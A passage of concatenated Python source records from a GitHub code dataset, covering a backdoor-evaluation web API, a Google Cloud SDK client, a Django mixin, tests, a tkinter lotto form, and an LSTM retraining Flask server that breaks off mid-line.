model = request.files['model']\n app_tracker.file_name = model.filename\n app_tracker.model_loader.make_classifier(request.form['type'],\n request.form['dataset'],\n model_params,\n model)\n\n return jsonify('Creating/choosing the classifier was successful.')\n\n\n# Attacks & Defences ---------------------------------------------------\n@app.route('/get_all_models', methods=['GET'])\ndef get_all_models():\n '''Returns a list of all the attacks and their info in JSON format.'''\n _, models = import_submodules_attributes(package=backdoorpony.models, result=[\n ], recursive=True, req_module=None, req_attr=['__name__', '__category__','__input_type__', '__info__', '__link__'])\n return jsonify(models)\n\n@app.route('/get_all_attacks', methods=['GET'])\ndef get_all_attacks():\n '''Returns a list of all the attacks and their info in JSON format.'''\n _, attacks = import_submodules_attributes(package=backdoorpony.attacks, result=[\n ], recursive=True, req_module=None, req_attr=['__name__', '__category__','__input_type__', '__info__', '__link__'])\n return jsonify(attacks)\n\n\n@app.route('/get_all_defences', methods=['GET'])\ndef get_all_defences():\n '''Returns a list of all the defences and their info in JSON format.'''\n _, defences = import_submodules_attributes(package=backdoorpony.defences, result=[], recursive=True, req_module=None, req_attr = ['__name__', '__category__', '__input_type__', '__info__', '__link__'])\n return jsonify(defences)\n\n\n@app.route('/get_stored_attack_name', methods=['GET'])\ndef get_stored_attack_name():\n '''Returns the stored attack name.'''\n return app_tracker.attack_name\n\n\n@app.route('/get_stored_defence_name', methods=['GET'])\ndef get_stored_defence_name():\n '''Returns the stored defence name.'''\n return app_tracker.defence_name\n\n\n@app.route('/get_stored_attack_category', methods=['GET'])\ndef get_stored_attack_category():\n '''Returns the stored attack category.'''\n return app_tracker.attack_category\n\n\n@app.route('/get_stored_defence_category', methods=['GET'])\ndef get_stored_defence_category():\n '''Returns the stored defence category.'''\n return app_tracker.defence_category\n\n\n# Params ---------------------------------------------------------------\n\n@app.route('/get_default_model_params', methods=['POST'])\ndef get_default_model_params():\n '''Returns a list of all the default model parameters in JSON format.'''\n dataset_name = request.form['modelName']\n model_name = dataset_to_model[dataset_name]\n _, default_params = import_submodules_attributes(package=backdoorpony.models, result=[\n ], recursive=True, req_module=model_name, req_attr=['__category__', '__defaults__'], debug=False)\n return jsonify(default_params)\n\n\n@app.route('/get_default_attack_params', methods=['POST'])\ndef get_default_attack_params():\n '''Returns a list of all the default attack parameters in JSON format.'''\n attack_name = request.form['attackName'].lower()\n app_tracker.attack_name = attack_name\n _, default_params = import_submodules_attributes(package=backdoorpony.attacks, result=[\n ], recursive=True, req_module=attack_name, req_attr=['__category__', '__defaults_form__', '__defaults_dropdown__', '__defaults_range__'])\n\n return jsonify(default_params)\n\n\n@app.route('/get_default_defence_params', methods=['POST'])\ndef get_default_defence_params():\n '''Returns a list of all the default defence parameters in JSON format.'''\n defence_name = request.form['defenceName'].lower()\n _, default_params = import_submodules_attributes(package=backdoorpony.defences, result=[\n ], recursive=True, req_module=defence_name, req_attr = ['__category__', '__defaults_form__', '__defaults_dropdown__', '__defaults_range__'])\n return jsonify(default_params)\n\n\n@app.route('/get_stored_attack_params', methods=['GET'])\ndef get_stored_attack_params():\n '''Returns the dictionary storing attack parameters in JSON format.'''\n return jsonify(app_tracker.attack_params_combined)\n\n\n@app.route('/get_stored_defence_params', methods=['GET'])\ndef get_stored_defence_params():\n '''Returns the dictionary storing defence parameters in JSON format.'''\n return jsonify(app_tracker.defence_params_combined)\n\n# Execute ------------------------------------------------------------\n@app.route('/execute', methods=['POST'])\n@cross_origin()\ndef execute():\n '''Executes the selected attack and/or defence with their corresponding parameters\n If attackName is not in the form, no attack will be executed.\n If defenceName is not in the form, no defence will be executed.\n\n in form:\n attackName\n defenceName\n attackParams\n defenceParams\n attackCategory\n defenceCategory\n '''\n app_tracker.reset_action_info()\n clean_classifier = app_tracker.model_loader.get_classifier()\n test_data = app_tracker.model_loader.get_test_data()\n if hasattr(app_tracker.model_loader, 'audio'):\n test_data = app_tracker.model_loader.audio_test_data\n execution_history = {}\n\n if 'attackName' in request.form:\n print(request.form)\n app_tracker.attack_name = request.form['attackName']\n app_tracker.attack_category = request.form['attackCategory']\n app_tracker.attack_params_form = json.loads(request.form['attackParamsForm'].replace(\"'\", '\"'))\n app_tracker.attack_params_dropdown = json.loads(request.form['attackParamsDropdown'].replace(\"'\", '\"'))\n app_tracker.attack_params_range = json.loads(request.form['attackParamsRange'].replace(\"'\", '\"'))\n app_tracker.attack_params_combined = {**app_tracker.attack_params_form, **app_tracker.attack_params_dropdown, \n **app_tracker.attack_params_range}\n train_data = app_tracker.model_loader.get_train_data()\n if hasattr(app_tracker.model_loader, 'audio'):\n train_data = app_tracker.model_loader.audio_train_data\n execution_history = app_tracker.action_runner.run_attack(clean_classifier=clean_classifier,\n train_data=train_data,\n test_data=test_data,\n execution_history=execution_history,\n attack_to_run=app_tracker.attack_name,\n attack_params=app_tracker.attack_params_combined)\n\n if hasattr(app_tracker.model_loader, 'audio'):\n test_data = app_tracker.model_loader.get_test_data()\n if 'defenceName' in request.form:\n app_tracker.defence_name = request.form['defenceName']\n app_tracker.defence_category = request.form['defenceCategory']\n app_tracker.defence_params_form = json.loads(request.form['defenceParamsForm'].replace(\"'\", '\"'))\n app_tracker.defence_params_dropdown = json.loads(request.form['defenceParamsDropdown'].replace(\"'\", '\"'))\n app_tracker.defence_params_range = json.loads(request.form['defenceParamsRange'].replace(\"'\", '\"'))\n app_tracker.defence_params_combined = {**app_tracker.defence_params_form, **app_tracker.defence_params_dropdown, \n **app_tracker.defence_params_range}\n execution_history = app_tracker.action_runner.run_defence(clean_classifier=clean_classifier,\n test_data=test_data,\n execution_history=execution_history,\n defence_to_run=app_tracker.defence_name,\n defence_params=app_tracker.defence_params_combined)\n\n\n app_tracker.main_metrics_runner.instantiate(clean_classifier=clean_classifier,\n execution_history=execution_history,\n benign_inputs=test_data,\n requests={})\n\n return jsonify('Execution of attack and/or defence was successful.')\n\n\n\n# Metrics -------------------------------------------------------------\n\n@app.route('/get_metrics_info', methods=['GET'])\n@cross_origin()\ndef get_metrics_info():\n '''Gets metrics available for the category of attack and or defence saved in the app_tracker\n Returns a dictionary with the following shape:\n {\n #for attack only\n : {\n name: ,\n pretty_name: ,\n info: ,\n is_attack_metric: True\n },\n #for defence only\n : {\n name: ,\n pretty_name: ,\n info: ,\n is_defence_metric: True\n },\n #for both attack and defence\n : {\n name: ,\n pretty_name: ,\n info: ,\n is_attack_metric: True/False,\n is_defence_metric: True/False\n }\n }\n '''\n _, metrics_info = import_submodules_attributes(package=backdoorpony.metrics, result=[], recursive=True, req_module=None, req_attr = ['__category__', '__info__'])\n\n available_metrics = {}\n\n if app_tracker.attack_category:\n for info in metrics_info:\n if info['category'] == app_tracker.attack_category:\n attack_metrics_info = info\n break\n for key, val in attack_metrics_info['info'].items():\n new_val = available_metrics.get(key, copy.deepcopy(val))\n new_val.update({'is_attack_metric': True, 'name': key})\n available_metrics.update({key: new_val})\n\n if app_tracker.defence_category:\n for info in metrics_info:\n if info['category'] == app_tracker.defence_category:\n defence_metrics_info = info\n break\n for key, val in defence_metrics_info['info'].items():\n new_val = available_metrics.get(key, copy.deepcopy(val))\n new_val.update({'is_defence_metric': True, 'name': key})\n available_metrics.update({key: new_val})\n\n return jsonify(available_metrics)\n\n\n@app.route('/get_metrics_results', methods=['POST'])\ndef get_metrics_results():\n '''Calculates the metrics in the request and returns in graph-compatible format\n '''\n request_metrics = json.loads(request.form['request'].replace(\"'\", '\"'))\n\n app_tracker.main_metrics_runner.update(requests=request_metrics)\n\n return jsonify(app_tracker.main_metrics_runner.get_results())\n\n\n# Configuration ----------------------------------------------------------\n\n@app.route('/get_configuration_file', methods=['GET'])\ndef get_configuration_file():\n '''Sends a file with the details of the executed configuration.\n Returns a dictionary containing values used for attack and/or defence name, category, input_type, parameters.\n '''\n return jsonify(app_tracker.generate_configuration_file())","repo_name":"Rezonansce/backdoorponyv2","sub_path":"server/src/backdoorpony/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13809,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"73704196353","text":"from .models import Category\r\n\r\nmenu = [{'title': \"Add a new event\", \"url_name\":'add_event'},\r\n {'title': \"Send a new mail\", \"url_name\":'send_mail'} ]\r\n\r\n\r\n\r\nclass DataMixin:\r\n def get_user_context(self,**kwargs):\r\n context = kwargs\r\n cats = Category.objects.all() \r\n user_menu = menu.copy()\r\n if not self.request.user.is_superuser:\r\n user_menu.clear()\r\n context[\"menu\"] = user_menu\r\n context[\"category\"] = cats\r\n if 'cat_selected' not in context:\r\n context['cat_selected'] = 0\r\n return context\r\n ","repo_name":"keyzoz/Django-EventsApp","sub_path":"eventApp/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5286892617","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.compute import utils as api_utils\nfrom googlecloudsdk.api_lib.compute.operations import poller\nfrom googlecloudsdk.api_lib.util import waiter\nfrom googlecloudsdk.command_lib.util.apis import arg_utils\n\n\nclass NetworkEndpointGroupsClient(object):\n \"\"\"Client for network endpoint groups service in the GCE API.\"\"\"\n\n def __init__(self, client, messages, resources):\n self.client = client\n self.messages = messages\n self.resources = resources\n self._zonal_service = self.client.apitools_client.networkEndpointGroups\n if hasattr(self.client.apitools_client, 'globalNetworkEndpointGroups'):\n self._global_service = self.client.apitools_client.globalNetworkEndpointGroups\n\n def Create(self, neg_ref, network_endpoint_type, default_port=None,\n network=None, subnet=None):\n \"\"\"Creates a network endpoint group.\"\"\"\n is_zonal = hasattr(neg_ref, 'zone')\n\n network_uri = None\n if network and is_zonal:\n network_ref = self.resources.Parse(network, {'project': neg_ref.project},\n collection='compute.networks')\n network_uri = network_ref.SelfLink()\n subnet_uri = None\n if subnet and is_zonal:\n region = api_utils.ZoneNameToRegionName(neg_ref.zone)\n subnet_ref = self.resources.Parse(\n subnet,\n {'project': neg_ref.project, 'region': region},\n collection='compute.subnetworks')\n subnet_uri = subnet_ref.SelfLink()\n\n endpoint_type_enum = (self.messages.NetworkEndpointGroup\n .NetworkEndpointTypeValueValuesEnum)\n network_endpoint_group = self.messages.NetworkEndpointGroup(\n name=neg_ref.Name(),\n networkEndpointType=arg_utils.ChoiceToEnum(network_endpoint_type,\n endpoint_type_enum),\n defaultPort=default_port,\n network=network_uri,\n subnetwork=subnet_uri)\n\n if is_zonal:\n request = self.messages.ComputeNetworkEndpointGroupsInsertRequest(\n networkEndpointGroup=network_endpoint_group,\n project=neg_ref.project,\n zone=neg_ref.zone)\n return self.client.MakeRequests([(self._zonal_service, 'Insert', request)\n ])[0]\n else:\n request = self.messages.ComputeGlobalNetworkEndpointGroupsInsertRequest(\n networkEndpointGroup=network_endpoint_group, project=neg_ref.project)\n return self.client.MakeRequests([(self._global_service, 'Insert', request)\n ])[0]\n\n def _AttachZonalEndpoints(self, neg_ref, endpoints):\n \"\"\"Attaches network endpoints to a zonal network endpoint group.\"\"\"\n request_class = (\n self.messages.ComputeNetworkEndpointGroupsAttachNetworkEndpointsRequest)\n nested_request_class = (\n self.messages.NetworkEndpointGroupsAttachEndpointsRequest)\n request = request_class(\n networkEndpointGroup=neg_ref.Name(),\n project=neg_ref.project,\n zone=neg_ref.zone,\n networkEndpointGroupsAttachEndpointsRequest=nested_request_class(\n networkEndpoints=self._GetEndpointMessageList(endpoints)))\n return self._zonal_service.AttachNetworkEndpoints(request)\n\n def _DetachZonalEndpoints(self, neg_ref, endpoints):\n \"\"\"Detaches network endpoints from a zonal network endpoint group.\"\"\"\n request_class = (\n self.messages.ComputeNetworkEndpointGroupsDetachNetworkEndpointsRequest)\n nested_request_class = (\n self.messages.NetworkEndpointGroupsDetachEndpointsRequest)\n request = request_class(\n networkEndpointGroup=neg_ref.Name(),\n project=neg_ref.project,\n zone=neg_ref.zone,\n networkEndpointGroupsDetachEndpointsRequest=nested_request_class(\n networkEndpoints=self._GetEndpointMessageList(endpoints)))\n return self._zonal_service.DetachNetworkEndpoints(request)\n\n def _AttachGlobalEndpoints(self, neg_ref, endpoints):\n \"\"\"Attaches network endpoints to a global network endpoint group.\"\"\"\n request_class = (\n self.messages\n .ComputeGlobalNetworkEndpointGroupsAttachNetworkEndpointsRequest)\n nested_request_class = (\n self.messages.GlobalNetworkEndpointGroupsAttachEndpointsRequest)\n request = request_class(\n networkEndpointGroup=neg_ref.Name(),\n project=neg_ref.project,\n globalNetworkEndpointGroupsAttachEndpointsRequest=nested_request_class(\n networkEndpoints=self._GetEndpointMessageList(endpoints)))\n return self._global_service.AttachNetworkEndpoints(request)\n\n def _DetachGlobalEndpoints(self, neg_ref, endpoints):\n \"\"\"Detaches network endpoints from a global network endpoint group.\"\"\"\n request_class = (\n self.messages\n .ComputeGlobalNetworkEndpointGroupsDetachNetworkEndpointsRequest)\n nested_request_class = (\n self.messages.GlobalNetworkEndpointGroupsDetachEndpointsRequest)\n request = request_class(\n networkEndpointGroup=neg_ref.Name(),\n project=neg_ref.project,\n globalNetworkEndpointGroupsDetachEndpointsRequest=nested_request_class(\n networkEndpoints=self._GetEndpointMessageList(endpoints)))\n return self._global_service.DetachNetworkEndpoints(request)\n\n def _GetEndpointMessageList(self, endpoints):\n \"\"\"Convert endpoints to a list which can be passed in a request.\"\"\"\n output_list = []\n for arg_endpoint in endpoints:\n message_endpoint = self.messages.NetworkEndpoint()\n if 'instance' in arg_endpoint:\n message_endpoint.instance = arg_endpoint.get('instance')\n if 'ip' in arg_endpoint:\n message_endpoint.ipAddress = arg_endpoint.get('ip')\n if 'port' in arg_endpoint:\n message_endpoint.port = arg_endpoint.get('port')\n if 'fqdn' in arg_endpoint:\n message_endpoint.fqdn = arg_endpoint.get('fqdn')\n output_list.append(message_endpoint)\n\n return output_list\n\n def _GetOperationsRef(self, operation):\n return self.resources.Parse(operation.selfLink,\n collection='compute.zoneOperations')\n\n def _GetGlobalOperationsRef(self, operation):\n return self.resources.Parse(\n operation.selfLink, collection='compute.globalOperations')\n\n def _WaitForResult(self, operation_poller, operation_ref, message):\n if operation_ref:\n return waiter.WaitFor(operation_poller, operation_ref, message)\n return None\n\n def Update(self, neg_ref, add_endpoints=None, remove_endpoints=None):\n \"\"\"Updates a Compute Network Endpoint Group.\"\"\"\n attach_endpoints_ref = None\n detach_endpoints_ref = None\n operation_poller = None\n\n if hasattr(neg_ref, 'zone'):\n operation_poller = poller.Poller(self._zonal_service)\n if add_endpoints:\n operation = self._AttachZonalEndpoints(neg_ref, add_endpoints)\n attach_endpoints_ref = self._GetOperationsRef(operation)\n if remove_endpoints:\n operation = self._DetachZonalEndpoints(neg_ref, remove_endpoints)\n detach_endpoints_ref = self._GetOperationsRef(operation)\n else:\n operation_poller = poller.Poller(self._global_service)\n if add_endpoints:\n operation = self._AttachGlobalEndpoints(neg_ref, add_endpoints)\n attach_endpoints_ref = self._GetGlobalOperationsRef(operation)\n if remove_endpoints:\n operation = self._DetachGlobalEndpoints(neg_ref, remove_endpoints)\n detach_endpoints_ref = self._GetGlobalOperationsRef(operation)\n\n neg_name = neg_ref.Name()\n result = None\n result = self._WaitForResult(\n operation_poller, attach_endpoints_ref,\n 'Attaching {0} endpoints to [{1}].'.format(\n len(add_endpoints) if add_endpoints else 0, neg_name)) or result\n result = self._WaitForResult(\n operation_poller, detach_endpoints_ref,\n 'Detaching {0} endpoints from [{1}].'.format(\n len(remove_endpoints) if remove_endpoints else 0, neg_name)\n ) or result\n\n return result\n","repo_name":"egzonarexhepi/mathpixlatexconverter","sub_path":"frontend/matt12345/google-cloud-sdk/lib/googlecloudsdk/api_lib/compute/network_endpoint_groups.py","file_name":"network_endpoint_groups.py","file_ext":"py","file_size_in_byte":8073,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"4303721835","text":"\"\"\"Test the leica helper functions.\"\"\"\nfrom pathlib import PureWindowsPath\n\nfrom camacq.plugins.leica.helper import find_image_path, get_field, get_imgs, get_well\n\nfrom tests.common import FIELD_PATH, IMAGE_PATH, WELL_PATH\n\n\ndef test_find_image_path():\n \"\"\"Test find image path.\"\"\"\n parts = IMAGE_PATH.parts\n root = parts[0]\n relpath = parts[1:]\n windows_path = PureWindowsPath(\"\")\n relpath = windows_path.joinpath(*relpath)\n\n path = find_image_path(str(relpath), root)\n\n assert path == str(IMAGE_PATH)\n\n\ndef test_get_field():\n \"\"\"Test get field.\"\"\"\n path = get_field(IMAGE_PATH)\n\n assert path == str(IMAGE_PATH.parent)\n\n\ndef test_get_well():\n \"\"\"Test get well.\"\"\"\n path = get_well(IMAGE_PATH)\n\n assert path == str(WELL_PATH)\n\n\ndef test_get_imgs():\n \"\"\"Test get imgs.\"\"\"\n images = get_imgs(str(WELL_PATH), search=\"C31\")\n\n assert len(images) == 6\n\n images = get_imgs(str(FIELD_PATH), search=\"C22\")\n\n assert len(images) == 3\n","repo_name":"CellProfiling/cam_acq","sub_path":"tests/plugins/leica/test_helper.py","file_name":"test_helper.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"16550086709","text":"from tkinter import *\nimport rsaidnumber\nfrom datetime import datetime, timedelta\nfrom tkinter import messagebox\nfrom email_validator import validate_email, EmailNotValidError\n\nmaster = Tk()\nmaster.geometry(\"600x500\")\nmaster.config(bg=\"#111\")\n\ncanvas = Canvas(master, width=300, height=100)\ncanvas.place(x=150, y=10)\nimg = PhotoImage(file=\"img_1.png\")\ncanvas.create_image(0, 0, anchor=NW, image=img)\n\nname_lab = Label(master, text=\"Enter name:\", bg=\"#111\", fg=\"gold\", font=15)\nname_lab.place(x=100, y=150)\n\nname_ent = Entry(master)\nname_ent.place(x=300, y=150)\n\nemail_lab = Label(master, text=\"Enter email address:\", bg=\"#111\", fg=\"gold\", font=15)\nemail_lab.place(x=100, y=200)\n\nemail_ent = Entry(master)\nemail_ent.place(x=300, y=200)\n\nid_num_lab = Label(master, text=\"Enter ID number:\", bg=\"#111\", fg=\"gold\", font=15)\nid_num_lab.place(x=100, y=250)\n\nid_num_ent = Entry(master)\nid_num_ent.place(x=300, y=250)\n\naddress_lab = Label(master, text=\"Enter address:\", bg=\"#111\", fg=\"gold\", font=15)\naddress_lab.place(x=100, y=300)\n\naddress_ent = Entry(master)\naddress_ent.place(x=300, y=300)\n\n\ndef sub():\n # adding contents to a text file\n text = \"\"\n my_file = open(\"Text_file.txt\", 'a')\n text += \"Username: \" + name_ent.get()\n text += '\\n'\n text += \"Email: \" + email_ent.get()\n text += '\\n'\n text += \"Address: \" + address_ent.get()\n text += '\\n'\n text += \"ID number: \" + id_num_ent.get()\n text += '\\n'\n my_file.write(text)\n\n # verifying id number and checking age\n id_num = rsaidnumber.parse(id_num_ent.get())\n age = ((datetime.today() - id_num.date_of_birth) // timedelta(days=365.25))\n if age >= 18:\n messagebox.showinfo(\"Let's Play\")\n else:\n years_left = 18 - age\n messagebox.showinfo(\"Error\", \"Return in\" + '\\n' + str(years_left) + \"years time\")\n\n # checking if email is valid\n try:\n validate_email(email_ent.get())\n\n except EmailNotValidError:\n # email is not valid\n messagebox.showinfo(\"Invalid Email. Try again\")\n master.destroy()\n import Random_window\n\n\nsub_btn = Button(master, text=\"Submit\", width=10, height=2, bg=\"#111\", fg=\"gold\", font=15, command=sub)\nsub_btn.place(x=230, y=350)\n\n\nmaster.mainloop()\n","repo_name":"Zaid070902/Lotto_Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75092072194","text":"from flask import Flask, render_template, jsonify, request, session, redirect, url_for, flash\nfrom flask_wtf import FlaskForm\nfrom flask_cors import CORS\nfrom flask_bootstrap import Bootstrap\nfrom wtforms import StringField, SubmitField\nfrom wtforms.validators import Required\n\nfrom keras.models import load_model, Sequential\nfrom keras.layers import Dense, Flatten, LSTM, Conv1D, MaxPooling1D, Dropout, Activation\nfrom keras.layers.embeddings import Embedding\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras import backend as K\nimport tensorflow as tf\n\napp = Flask(__name__,template_folder='flask_templates')\nBootstrap(app)\nCORS(app)\n\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\n\nfrom io import StringIO\nimport nltk\nimport string\nimport os\nimport glob\nimport json\nimport datetime\nfrom nltk.corpus import stopwords\nfrom nltk.stem import SnowballStemmer\nfrom nltk.corpus import stopwords\nimport re\nimport pickle\nimport shutil\n\ntokenizer = None\nlstm_model = None\nmax_length = 100\ngraph = None\nmodel_version = None\n\napp.config['SECRET_KEY'] = 'hard to guess string'\n\ndef clean_text(text):\n if text is None:\n return \"\"\n elif isinstance(text,float):\n if str(text) == 'nan':\n #print('nan')\n return \"\"\n\n ## Remove puncuation\n text = text.translate(string.punctuation)\n\n ## Convert words to lower case and split them\n text = text.lower().split()\n\n ## Remove stop words\n stops = set(stopwords.words(\"english\"))\n text = [w for w in text if not w in stops and len(w) >= 3]\n\n text = \" \".join(text)\n\n # Clean the text\n text = re.sub(r\"[^A-Za-z0-9^,!.\\/'+-=]\", \" \", text)\n text = re.sub(r\"\\s{2,}\", \" \", text)\n\n text = text.split()\n stemmer = SnowballStemmer('english')\n stemmed_words = [stemmer.stem(word) for word in text]\n text = \" \".join(stemmed_words)\n\n #print(text)\n return text\n\ndef get_lstm_model_function(vocabulary_size):\n\n def create_lstm_model(optimizer='adam'):\n model_lstm = Sequential()\n model_lstm.add(Embedding(vocabulary_size, 100, input_length=max_length))\n model_lstm.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2))\n model_lstm.add(Dense(1, activation='sigmoid'))\n model_lstm.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n return model_lstm\n \n return create_lstm_model\n\ndef formatDataframe(df):\n df.fillna('')\n print(df[:100])\n df['combined_text'] = df.apply(lambda x: x.OtherSx2, axis=1)\n df['combined_text_clean'] = df['combined_text'].map(lambda x : clean_text(x))\n return df\n\n@app.route('/trainingCSVHeaders', methods=['GET'])\ndef getTrainingCSVHeaders():\n responses = jsonify({\"headers\":\"examDescription,OtherHx,OtherSx,OtherSx2,indicationDescription,label_binary\"})\n responses.status_code = 200\n return responses\n\n@app.route('/load_model', methods=['POST'])\ndef loadModel():\n global lstm_model, tokenizer, graph, model_version\n modeldata_json = request.get_json()\n files = glob.glob('data/*_data')\n\n if modeldata_json['model_version'] in map(lambda x: x.replace('data/',''),files):\n try:\n print(\"Loading Pickle : data/\" + modeldata_json['model_version'] + \"/\" + modeldata_json['model_version'] + \"_tokenizer_combined.pickle\")\n with open('data/' + modeldata_json['model_version'] + '/' + modeldata_json['model_version'] + '_tokenizer_combined.pickle', 'rb') as handle:\n tokenizer = pickle.load(handle)\n print(tokenizer)\n except Exception as e:\n print('Could not open tokenizer')\n print(e)\n responses = jsonify({\"message\":\"undo error (tokenizer), please contact admin.\"})\n responses.status_code = 500\n return(responses)\n raise e\n K.clear_session()\n graph = tf.get_default_graph()\n try:\n print(\"Loading LSTM Model : data/\" + modeldata_json['model_version'] + \"/\" + modeldata_json['model_version'] + \"_combined.h5\")\n lstm_model = load_model('data/' + modeldata_json['model_version'] + '/' + modeldata_json['model_version'] + '_combined.h5')\n #update model_version\n model_version = \"ml_postproc_lstm_\" + modeldata_json['model_version']\n except Exception as e:\n print('Could not open lstm_model')\n print(e)\n responses = jsonify({\"message\":\"undo error (lstm_model), please contact admin.\"})\n responses.status_code = 500\n return(responses)\n raise e\n\n responses = jsonify({\"message\":\"loading of model: \" + model_version + \" complete.\"})\n responses.status_code = 200\n return(responses)\n raise e\n\n else:\n responses = jsonify({\"message\": modeldata_json['model_version'] + \" not found.\"})\n responses.status_code = 500\n return responses\n\n@app.route('/model_version', methods=['GET'])\ndef getModelVersion():\n global model_version\n responses = jsonify({\"message\":model_version})\n responses.status_code = 200\n return responses\n\n@app.route('/undo_retrain', methods=['POST'])\ndef undoRetrain():\n global tokenizer, graph, lstm_model, model_version\n K.clear_session()\n\n files = glob.glob('data/*_data')\n files.sort(reverse=True)\n responses = None\n\n if len(files) == 0:\n responses = jsonify({\"messsage\":\"no models available to undo. model_version remains: \" + model_version})\n responses.status_code = 500\n return(responses)\n\n if len(files) == 1:\n shutil.rmtree(files[0])\n responses = jsonify({\"messsage\":\"undo complete. model_version remains: \" + model_version})\n responses.status_code = 200\n return(responses)\n\n try:\n print(\"Loading Pickle : \" + files[1] + \"/\" + files[1].replace('data/','') + \"_tokenizer_combined.pickle\")\n with open(files[1] + '/' + files[1].replace('data/','') + '_tokenizer_combined.pickle', 'rb') as handle:\n tokenizer = pickle.load(handle)\n print(tokenizer)\n except Exception as e:\n print('Could not open tokenizer')\n print(e)\n responses = jsonify({\"message\":\"undo error (tokenizer), please contact admin.\"})\n responses.status_code = 500\n return(responses)\n raise e\n graph = tf.get_default_graph()\n try:\n print(\"Loading LSTM Model : \" + files[1] + \"/\" + files[1].replace('data/','') + \"_combined.h5\")\n lstm_model = load_model(files[1] + '/' + files[1].replace('data/','') + '_combined.h5')\n #update model_version\n model_version = \"ml_postproc_lstm_\" + files[1].replace('data/','')\n except Exception as e:\n print('Could not open lstm_model')\n print(e)\n responses = jsonify({\"message\":\"undo error (lstm_model), please contact admin.\"})\n responses.status_code = 500\n return(responses)\n raise e\n \n try:\n shutil.rmtree(files[0])\n except e:\n print('Could not delete previous model')\n responses = jsonify({\"message\":\"undo error (file removal), please contact admin.\"})\n responses.status_code = 500\n return(responses)\n raise e\n\n \n responses = jsonify({\"message\":\"undo complete. model_version: \" + model_version})\n responses.status_code = 200\n return(responses)\n\n@app.route('/retrain', methods=['POST'])\ndef retrain():\n global graph, tokenizer, lstm_model, model_version\n K.clear_session()\n\n try:\n csv_data = None\n json_data = None\n\n if request.is_json:\n json_data = json.loads(request.get_json())['data']\n else:\n csv_data = request.files['data']\n\n now_date_folder_name = datetime.datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\") + \"_data\"\n\n new_data_df = None\n previous_data_df = None\n\n if (not os.path.isdir('data/' + now_date_folder_name)):\n\n #if 'model' in model_csv_json:\n os.makedirs('data/' + now_date_folder_name)\n #print(model_csv_json['model'])\n #new_data_df = pd.read_json(model_csv_json['data'])\n if csv_data:\n #print(csv_data)\n new_data_df = pd.read_csv(csv_data)\n else:\n new_data_df = pd.read_json(json_data)\n\n new_data_df.to_csv('data/' + now_date_folder_name + \"/\" + now_date_folder_name + \".csv\",index=False)\n #else:\n #return getTrainingHeaders()\n\n\n files = glob.glob('data/*_data')\n files.sort(reverse=True)\n print(files)\n\n #files[0].replace('data/','')\n if len(files) > 1 and files[0] == 'data/' + now_date_folder_name:\n print(files[1])\n previous_data_df = pd.read_csv(files[1] + \"/\" + files[1].replace('data/','') + \"_combined.csv\")\n new_data_df = pd.concat([new_data_df,previous_data_df])\n \n new_data_df.to_csv('data/' + now_date_folder_name + \"/\" + now_date_folder_name + \"_combined.csv\",index=False)\n\n new_data_df = formatDataframe(new_data_df)\n\n max_length = 100\n new_tokenizer = Tokenizer()\n new_tokenizer.fit_on_texts(new_data_df['combined_text_clean'])\n vocabulary_size = len(new_tokenizer.word_index) + 1\n sequences = new_tokenizer.texts_to_sequences(new_data_df['combined_text_clean'])\n lstm_data = pad_sequences(sequences, maxlen=max_length)\n\n new_lstm_model = KerasClassifier(build_fn=get_lstm_model_function(vocabulary_size), epochs=3, verbose=0)\n X_train, X_test, y_train, y_test, indices_train, indices_test = train_test_split(lstm_data, new_data_df.label_binary, new_data_df.index, test_size=0.10, random_state=0)\n new_lstm_model.fit(X_train, y_train, validation_data=(X_test,y_test), epochs=3)\n\n new_lstm_model.model.save('data/' + now_date_folder_name + '/' + now_date_folder_name + '_combined.h5')\n with open('data/' + now_date_folder_name + '/' + now_date_folder_name + '_tokenizer_combined.pickle','wb') as handle: \n pickle.dump(new_tokenizer,handle,protocol=pickle.HIGHEST_PROTOCOL) \n\n print(\"Re-Loading LSTM Model : data/\" + now_date_folder_name + '/' + now_date_folder_name + \"_combined.h5\")\n lstm_model = load_model('data/' + now_date_folder_name + '/' + now_date_folder_name + '_combined.h5')\n model_version = \"ml_postproc_lstm_\" + now_date_folder_name\n #lstm_model = new_lstm_model\n tokenizer = new_tokenizer\n graph = tf.get_default_graph()\n\n except Exception as e:\n raise e\n responses = jsonify({\"message\":\"retraining complete. model_version: \" + model_version})\n responses.status_code = 200\n return(responses)\n\ndef getPrediction(examDescription=\"\", OtherHX=\"\", OtherSX=\"\", OtherSX2=\"\", indicationDescription=\"\"):\n global lstm_model, tokenizer, max_length, graph, model_version\n #to_classify = examDescription + '. ' + OtherSX + '. ' + indicationDescription\n #to_classify = examDescription + '. ' + OtherHX + '. ' + OtherSX + '. ' + indicationDescription\n to_classify = OtherSX2\n print(to_classify)\n to_classify = clean_text(to_classify)\n to_classify = pad_sequences(tokenizer.texts_to_sequences([to_classify]),maxlen=max_length)\n print(to_classify)\n\n prediction = [[]]\n with graph.as_default():\n prediction = lstm_model.predict(to_classify)\n #prediction = lstm_model.predict_proba(to_classify)\n #prediction = 1.0 - float(prediction[0][0])\n prediction = prediction[0][0]\n print(prediction)\n #return(str(1.0-prediction[0][0]))\n return(str(prediction))\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n try:\n orderdata_json = request.get_json()\n print(orderdata_json)\n except Exception as e:\n raise e\n prediction = 